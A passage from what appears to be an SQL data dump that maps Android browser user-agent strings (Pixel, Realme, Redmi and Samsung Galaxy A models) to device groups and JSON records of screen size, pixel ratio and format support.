Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 3a XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":864,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 3a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":808,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 4 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 4a (5G)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 4a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX1921) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX1931) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX1971) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX1993) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2061) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2063) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2075) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2086) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2101) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2111) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2151) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2170) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2180) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2193) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2195) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX2202) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX3081) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX3085) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX3151) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":804,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX3191) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX3201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX3231) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX3241) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX3261) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; RMX3363) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Redmi 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Redmi K20 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Redmi Note 10 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Redmi Note 8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Redmi Note 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Redmi Note 8T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Redmi Note 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; Redmi Note 9S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; S42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A015M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A025G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A025M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A105FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A107F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A107M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A115M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A125F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A125M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A127F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A202F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A207F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A207M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A217F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A217M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A225F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A226B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":857,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A307G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A315F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A315G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A325F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A325M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A326B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A405FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A426B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A505FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A505FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A505G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 